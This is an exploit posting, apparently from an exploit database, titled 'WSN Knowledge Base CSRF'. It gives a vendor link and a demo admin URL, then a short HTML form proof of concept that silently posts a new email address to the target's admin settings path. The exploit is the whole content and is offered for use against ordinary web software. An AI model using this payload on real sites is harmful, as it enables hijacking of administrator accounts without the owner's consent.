# Exploit Title: WSN Knowledge Base CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/wsn-knowledge-base/19009/
# Category:: webapps
# Demo : http://demo.wsnforum.com/wsnkbadmin/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form name="sysform" action="target.com/admin/[PATH]" method="post">
<input name="email" size="30" value="mail@mail.com" type="hidden">
<input value="Update Settings" class="button" type="submit">
</form>